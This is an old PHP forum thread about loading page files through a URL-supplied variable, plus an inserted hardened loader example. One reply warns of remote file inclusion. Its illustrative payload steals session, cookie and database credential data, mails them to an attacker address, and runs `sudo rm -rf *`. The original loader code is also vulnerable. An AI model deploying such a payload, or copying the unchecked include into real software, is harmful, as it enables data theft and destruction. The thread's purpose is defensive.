PHP Passing variables in a URL to use in include($variable.php);



FlashFish
January 15th, 2010, 10:05 AM
I think the title sums it up, I'm trying to load php content into a main php page based on variables (?pag) sent from the url. These content files also use a variable (?client) to pull info from a database. Everything works on its own and I can include the content files with a standard:

include("overview.php");

but as soon as I start trying to swap the filename for a variable I get problems. Either I get errors or the main page loads without the content. Can somebody please check my code? This current version produces this error. Line 55 is the include.

Parse error: syntax error, unexpected '.' in /homepages/73/d165769927/htdocs/MDWEB/campaignreports/campaignreport.php on line 55


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>

<?php
$pag = $_GET['pag'];
$client = $_GET['client'];

print'
<div id="container">
<div id="content">
<div id="framegallery" style="width: 860px; height: 100%">
<img src="header.jpg" border="0" usemap="#Map" style="border:0px;" />
<map name="Map" id="Map">
<area shape="rect" coords="24,69,107,94" href="http://www.mysite.tv/campaignreports/campaignreport.php?client='.$client.'&?pag=overview" alt="overview" />
<area shape="rect" coords="141,69,275,94" href="http://www.mysite.tv/campaignreports/campaignreport.php?client='.$client.'&?pag=activity" alt="activity report" />
<area shape="rect" coords="317,67,384,95" href="http://www.mysite.tv/campaignreports/campaignreport.php?client='.$client.'&?pag=gallery" alt="gallery" />
<area shape="rect" coords="417,67,509,96" href="http://www.mysite.tv/campaignreports/campaignreport.php?client='.$client.'&?pag=summary" alt="summary" />
</map>
<table width="100%" border="0" cellpadding="28" cellspacing="0">
<tr>
<td background="indexfiles/light-trail-LARGE.jpg" STYLE="background-position: bottom; background-repeat:no-repeat;" bgcolor="#080808">

'?>


<?php
include(.$pag.".php");
?>

<br /><br />
</td></tr>
</table>
</div>
</div>
</div>
</body>
</html>

Thanks in advance!

jwilliam
January 15th, 2010, 10:20 AM
A parse error means your syntax is incorrect. I believe it should be:

include($pag . ".php");

instead of

include(.$pag.".php");

FlashFish
January 15th, 2010, 10:33 AM
Thanks for the reply, I must have tried 100 different variations of that today! Although it fixes the parse error, only the main page is loading and not the included file. I think that's one of two problems solved... Thanks again.

FlashFish
January 15th, 2010, 10:38 AM
Aha, I've done a bit of testing and it seems the main page is not picking up on the $pag variable. $client works fine though. Getting there...

jwilliam
January 15th, 2010, 10:40 AM
Oh... I didn't look very closely at your code... sorry. You're building the query string wrong. It should look like this:

/path/to/script.php?client=foo&pag=bar

not

/path/to/script.php?client=foo&?pag=bar

FlashFish
January 15th, 2010, 10:49 AM
Yes. Absolutely. I just noticed that, I've got a habit of wrestling over these things for hours and then working them out just as I ask for help. I think typing out the problem clears things up! But thanks, that syntax error would have stumped me for ages. Jesus will want you for a sunbeam.

actionAction
January 15th, 2010, 02:04 PM
Since no one has said it yet, you should really be careful with this setup. It would be very easy to f your site up with the code you posted, and trust me, people will try.

/path/to/script.php?client=foo&pag=http://h4ck3r.com/php_code_in_text_file.txt

Possible Content of php_code_in_text_file.txt


<?php
// Attacker-hosted payload: pulled in and executed by the vulnerable include()
// Guess at the variable names the including script uses for its DB credentials
$database_attempts = array(
    '1' => $db,
    '2' => $database,
    '3' => $username,
    '4' => $db_user,
    '5' => $db_host,
    '6' => $host,
    '7' => $password,
    '8' => $db_password
);

// second argument true makes var_export() return the dump instead of printing it
$session     = var_export($_SESSION, true);
$cookies     = var_export($_COOKIE, true);
$credentials = var_export($database_attempts, true);

$mail = <<<MAILER
Session: $session
Cookies: $cookies
Credentials: $credentials
MAILER;

// exfiltrate everything, then try to wipe the document root
mail('bad_person@justscrewedyou.com', 'Bounty', $mail);

$bye = `sudo rm -rf *`;

?>


That code would/could be executed. You need to either limit the accepted files to include by using a switch statement or run a regex on the value passed in to remove backticks and URLs.


// only the names listed in the switch can ever reach include()
$f = isset($_GET['page']) ? stripslashes($_GET['page']) : '';
switch ($f) {
    case 'good':
    case 'alsogood':
        $file = $f;
        break;
    default:
        $file = 'some_default_page';
        break;
}
$include_file = $file . '.php';
include($include_file);
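
The following is an added example, not code from any post in this thread. It rewrites the ?pag= loader from the original post along the lines actionAction suggests (a fixed allow-list, so the user's string is only ever a lookup key and never part of a path), builds the tab links the way jwilliam describes (one "?" and "&"-separated pairs), and, when run from the command line, shows why the original links produced an empty $pag. The pages/ directory, the function names resolve_page, page_path and report_url, and the assumption that the four image-map tabs are the complete set of pages are mine; the hostname is taken from the links in the original post. Needs PHP 7.1 or later.

```php
<?php
// Added example, not code from the thread: a hardened version of the
// ?pag= page loader from the original post.
// Assumptions (not in the thread): the content files live in a pages/
// directory next to this script, and the four tabs in the image map are
// the complete set of pages.
declare(strict_types=1);

// Allow-list: the only ?pag= values that may ever reach include().
// The user's string is used as a lookup key, never as part of a path,
// so "../", "http://", a trailing null byte or any other file name trick
// has nothing to act on.
const PAGES = [
    'overview' => 'overview.php',
    'activity' => 'activity.php',
    'gallery'  => 'gallery.php',
    'summary'  => 'summary.php',
];
const DEFAULT_PAGE = 'overview';

// Map the raw ?pag= value to a file name, or null if it is not allowed.
// Missing/empty falls back to the default; anything else must match exactly.
function resolve_page($pag): ?string
{
    if ($pag === null || $pag === '') {
        return PAGES[DEFAULT_PAGE];
    }
    if (!is_string($pag)) {           // ?pag[]=x arrives as an array
        return null;
    }
    return array_key_exists($pag, PAGES) ? PAGES[$pag] : null;
}

// Resolve to an absolute path and confirm it really sits inside $dir.
// Returns null when the page is not allowed or the file is missing.
function page_path($pag, string $dir): ?string
{
    $file = resolve_page($pag);
    $base = realpath($dir);
    if ($file === null || $base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Build a tab link with a single "?" followed by "&"-separated pairs.
// http_build_query() URL-encodes the client value and htmlspecialchars()
// makes the result safe inside an href="..." attribute.
function report_url(string $client, string $pag): string
{
    $qs = http_build_query(['client' => $client, 'pag' => $pag]);
    return htmlspecialchars(
        'http://www.mysite.tv/campaignreports/campaignreport.php?' . $qs,
        ENT_QUOTES, 'UTF-8'
    );
}

if (PHP_SAPI === 'cli') {
    // Constructed probe values, including the remote URL from actionAction's post.
    $probes = [
        'overview', 'gallery', '../../../../etc/passwd',
        'http://h4ck3r.com/php_code_in_text_file.txt', "summary\0", ['x'], null,
    ];
    foreach ($probes as $p) {
        printf("%-50s => %s\n", var_export($p, true), var_export(resolve_page($p), true));
    }
    echo report_url('Foo & Co', 'gallery'), "\n";
    // Why the original links failed: "&?pag=" parses to a key named "?pag",
    // so $_GET['pag'] is never set.
    parse_str('client=foo&?pag=overview', $q);
    echo implode(', ', array_keys($q)), "\n";   // client, ?pag
} else {
    // Web usage: include at top level so $client stays visible to the page.
    $client = isset($_GET['client']) && is_string($_GET['client']) ? $_GET['client'] : '';
    $path = page_path($_GET['pag'] ?? null, __DIR__ . '/pages');
    if ($path === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $path;
}
```

Two caveats worth knowing when reading the thread's attack scenario: the remote-URL branch of actionAction's example only fires if allow_url_include is On (it has been Off by default since PHP 5.2), but the local traversal Yeldarb describes needs no special setting at all, which is why a fixed allow-list, rather than stripping URLs or backticks from the input, is the fix to reach for.
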

Yeldarb
January 15th, 2010, 02:28 PM
Since no one has said it yet, you should really be careful with this setup. It would be very easy to f your site up with the code you posted, and trust me, people will try.

+1

I came here just to post that, surprised no one mentioned it earlier. Not only the above but, depending on your permissions, etc., they could use it to view files outside your web directory (.passwd files, server settings, etc.) and to do things locally as if they were logged into the machine (delete/modify files, view source code, snoop in databases, etc.).

With the setup above you are basically giving anyone who wants it full access to your server.

jwilliam
January 15th, 2010, 02:35 PM
Whoops... You know, that was in the back of my mind while I was writing both of my previous posts... I just didn't say it... really it was. :)

actionAction
January 15th, 2010, 03:24 PM
Not only the above but, depending on your permissions, etc., they could use it to view files outside your web directory (.passwd files, server settings, etc.) and to do things locally as if they were logged into the machine (delete/modify files, view source code, snoop in databases, etc.).

I was trying to think of an example that would get my point across, but the things Yeldarb points out are more likely what would be done (viewing source code, database snooping).

@jwilliam I am usually consumed trying to answer the questions people ask; when someone beats me to it, I sometimes notice problems they didn't ask about.